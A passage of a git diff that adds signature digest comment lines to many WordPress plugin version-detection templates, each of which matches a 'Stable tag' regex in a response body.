a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..a0aa724b07 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aa08097f2932f86cc730062ad133062c9f98167e040220c914f7ebbb256d4e4502210080ce9bdc3110871bf36b63647439863283cb9bb6a92bc86b020ca96c0434b3c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..bbb34d413a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210096a71ad4e3e492659e43041b18afddac5ddbad79a8493b0405e91c52c56451af022100b091ad0197615ecba75e6b48ad26e13856c848036a5f67d58826f1079918ed1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..9e675fa3d3 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022022e1ffb84491b942ee249bf448a3afc223ca0a0b6ee4afe3b9e199aa7602d31a022043490048ab0a29703bb009dd0b03b6be1efd946e9716089ce8ed7e6a50a89bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..0e25172fac 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100edfcfe316f6d373367db1eac1fdf922809de78cecdf041f95fbb21c7ba529032022100b6e9bea0b1c48ac1c2ff30431819f805843887ad14116d67d08b1d892bea6e58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..2329d9e3a6 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204eb1e1f4d17d9935e5ba9b34999417169454bd144e4f657eaafe20b102aaf1b2022100ef241250a8fc8f51a922c360b8875d3c15e9d62c1b8b41fc0e53a0c9bc9fb129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..1ba2da6b13 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c850a28d368660d508b3c4a221511d67fcae8d17ac4c74c3ffa781f6748777e022100ebbde60bde0c6e2711608d27561a4602097c461e416c0254829b3ac7691a3ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..3ef8db90fd 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b2e52cb040ff0c4bf57a523e6808f7aa8ae673fad5176068b58ef4824b820e0b02205d0f1932cc31ff4c2dcfb3c1256746d9bfb370610601d023b2c40df8b23574d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..fb617fc5cd 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dea8294777993b79960dc9f06d2109304fbccb81f8d97daaa8a8d25236816f6102206170fe2e11c1e224e57bc6e4e18ad5593f8689d3b470e979df1f0a89804550e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..e8073dae96 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220712b33476093d4cd01cb94591b9d3a79c7955a85c5ad98e664aae5d98d076fbc02210092b89ded3232d7e015c1a8c7c51dcab74dda61b8758f2e70fed6a1e5f3e5345d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..2829bf0e5c 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022010c21c06ed53de4529e07d3a6f40e330ddeb77d73e2a9b0409679f97eb07f701022100a0f6a611794f9febf636652f2fe91de20b9f36048ed802f5706a8d8556e9a884:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..d54d37c4ff 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205e0856658fc34726ffd83ad6b4f02bf784cae9105fcff56e7421715109e22c04022018dd6b734362870f89b45f00458b4bfb9045f699e9ec32ea555b973b0d3dbb00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..c45a4417c2 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220733c02469df710216afeeb66adb30dd54c38b8d6921b2f01d68f2d57be4c45e4022100df4dede120980a539cf5973307378142fa0e8367aa5d194437f6c7f4d73c1296:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..334a775f33 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fc91eba7367d3610f5618b29703dcd4b9ffca887241cf0c122dd23daa1656731022100de89a6675a3750b2c2f80ae928efaa895b7e07001ddae38800811e8006bbc64f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..aed1e1c9e9 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220418a5da4e5a6087fb0a80de83a96cf4b3d445711306faa5222b68e23c785a7aa02205da4fa6752e939e431f305ec8d412fa1ca747cef217870f8835d983d7b719f20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..e7cc5308ff 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053e56405d492fa62301ad6b229c5fc9922358486962f8f4e3d6243544c32c61c02205e294199d9ca5a4b39dce00b61ce91035360dfd4d8295696bd12d0deaf2c4d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..95febf6fc5 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204750df9d9dafc49d9ef22eb2de49395a65a820521fedb4b3ab24f74b7732ba6202207a9ca548a5eb17ff849324256a3c9b9de7a253e038a4cad413a5fb225a4e8411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..8d53faecec 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002ba06d8cd6d3de119c622c98a3cbfd8ffff53f5c5eea6217c621fd12abda694022100981d8ef91a9560b6a4784462386732e8d8ac24d0d7451a5095c627fc3c8eedc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..532112c460 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022067eaa168ef0769c7276cd1f5444ff02eaca75617502e3dc2f4b1b0d1d3d0473e02206dd27aa92c389725c982f6ba4c27e44dcf60220c4d115f0ce3b382a473770cad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..25a297afc2 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200ea5b7be1198da6fc8f8c37eaee8d9a4141a7aa2c8f27720e1c0186b6c3e493b022005aa38023aafa8fbd28c03a5be5dd650d78adeec5bf696e71843bf132b702673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..4b1de16aac 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206ec2e8dded94fabbfc0245db786d7f942b11d86bf6b1392f587fc712740d202b022058c6f798f6e8f4a1ca5e584b564552682e5b23ed4599a98db6267659a3ac53e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..54f726f6ff 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ba85db9c7dfd688618d82716637d2dcd326bcaba8146635a15f2c968e5b33195022100fee5bc1b0d7b3acc89511a8a5e5f288c09cfebe28838c5fd55346aecdfb8b2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..1dc9c912c7 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ef1a98bca9c5ae6d2a2bbf5ec64f2c361fa8127da32ac2209bfb936d56dbfe25022100ab3b78ebf7fb6c5f543db5c0147188ae6106560352059d64900da5dcf86df2c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..fe6a33a0e0 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202dc82e319c52575e12ecb61e6f4c4e041b17323f9d3454c0f0c88b1ad67ab2ef02210084e16e1689b269cb71bae7cd63b9f186c69c8fa4cf749c9102bc5cf8c4646b3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..df8d7f395d 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053d87a2f96331c6dfeebac532e0419652dc52f0000a983b806e82719293f632702207b732dae4f2467359cf190fabf969a6bfadceaea5a9756b16f28a0de399080c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..d42ad8eab2 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e79ddd89c1dda5802ea07ed927878df1c5f5e4f4f903d71d38ffc0a75e8f5eb7022020dfffdb042a1dc6a746db16d951f009a4eb4118fdbb9925587db0bea1608cd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..65939ddd70 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210087bf45d9f08c88a823a1ddb7d53e247ba43c1f122980ea94ecdbac0d229a290b02202013bf3cb2a8191a1f2706ffb83856dab8541f3b1051d7f2e2449d4694055cab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..cae5a03713 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207b52fe2395314aa05e2f0f3dfaa329e0090cfee928ce96534b5a8c108c0da8060221009934f4ced7f835b1b4f05af8f81271cad70b72d74d8f9ada92354d239e4499a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..11a2dcde41 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022062e94de123bdffeebf27e2916a77e7cea38a39cf86b18bf20ee58c5c8613219d02202fcbcbb608c978eafd6c3f741b322eca3eb5f1a9f5ac3869f8c6fa55f7e6e263:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..1f085f1c88 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009e25328f33a9b54d8ec99e75104a60206450577be6c8d7ced464a24dffc578740220544b0e791677ae17fc3ef3bdda8b1f803d6a5e79e98f95f6e01a36078901b9ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..9c21eb26d4 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203e8efb0a48f7383cf931b1899df155f7052fc374c74bcba97e2219619ad4acc6022079bd5372677010f850bc6be7b685d65645ef32e8fb8fa74eab176fbd2ccb397b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..f170d1391e 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202c3c1d81cd307131714deee936111a301d06b49ca666d4fc27974f9521a7b1e402210093caa1d58caf3fcfd733fa7bdf8df8d8cf47ae3563f7c5968818d637d856847a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..7bcae4c31c 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220796cce5f30a46b7aa0aca457335d22b01fcf8af144dd42742d2b3c415f86527402210083bfdfbc1619eeb094103a449694561245ad9123f4d66d31bd3f9dbf80a9f7c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..3e2fee15b0 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009226f36604cbe7840a80c179a7dac97e46ee305603386cf53da4925f5cd6731302203f7a26c1aaba1fb32a7cc4eb5502a278e79b8603f0bedc01c46161f12a0f18ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..664daa09da 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c27cdf14f5aa58144be06d91f8f1da7e881858bcf0d59c011037bd315097bb202201ef9580e66602e3f236b5d0bd333f2a3cce69263a946510c5571029ea475b77f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..e08a2883c2 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100caeba3b0e21fc0f1f8684378b76bcab65300f504dd8350ef34cdf40a035d4d3f0220048b4c1c20ae626093750c9101482e397ce70da9a79dc066db080e6c5d4c6197:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..76192a7449 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c7282986778630ee702c52394c555110e1b0ad57c0d46cbb66c2c95aa5ed1802022100f66ada482f7cfafe8c060e116b3f66cc5538b6ae4e88d51ce85da70300f7cdc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..d5a92ff4d1 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d1170266c30778f70383b6664075b822b69332db78df9e5ba244569bd64ffa660220198c138e72e336beb5337610aac1d6fab8126dc5d5d93bab8cbf6c8d844700cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..2dd2364540 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe67abbeb4e2b1d58a606c2db3688f2999bc7a5f1d2f8e6502ba6a49bcef67d30220591a4b431aa568b6e5198a4601e8e799e9038b20a41ab0d1ef00cfca68fa4d8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..affd6b1a22 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022067c54eabf53d5ae9845e972c229913947c9bb0fdcafe6307a4db66268430dc6d022100bc2fe3fb52750f1d122294096ec3c96233f1f0fd76660367d07143cd862e114f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..458d2f373b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bd02697d33c888ff67211d087c0e5c40803985a073c63b5346d36352d47b3448022100d39ee56186265b01ae2215e037c78ff99bb16f74a53be300ef41c900124b6b55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..50a945354b 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ba67236669fbcf04134e504e2cd0b56e545323f09be7def392034971e0ff2de50221008de42c3e547d6a58dfd0d33b9036ca8d2deb1cce6d740643fba7753e25255f7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..7f26aa24c2 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220011a5aba8b1b4608644074331cc40d21aac9156745efd0f0cbadfcb315b73c38022100ae72a0b37b7d0616fd62898df1815459657dec470e555172055b4cf39b6ce58e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..85b09f7e64 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220769dbda86c0dfe33f123b4aa4a217017276d8996b2f420a317852999bf2a10b4022100f13b2b54cf62d11da8626430f963280f0b57f3b147e05aa142dd132034354937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..b4452138ef 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220607220b08c55cd5ab9be05ae892123d251ba7686ad1fd45c7ba9f92aae0fa29102203ea03318e1511311f39946aaffac1cf8b9b765ef55f545b8bbdecfdfb18a8e42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..366e5b3b12 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202c1bda5b8c4653c82f808d30df805e24d92c4d450ad2bbee8392c92b81a3d62e022053d137c58b60b489f3b67467909611ef55a17ae01002bf03492facbb5aa7e531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..1a95913258 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022006152f8d9c965d5a15f2c108e16c0b8177a786c76c7bda9bb8292bc2ee557c43022100e09c43b57ea5b0ea53d51e2cd9f55514f054ae32a23467d3e5948597a4dbecb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..9f881002bf 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 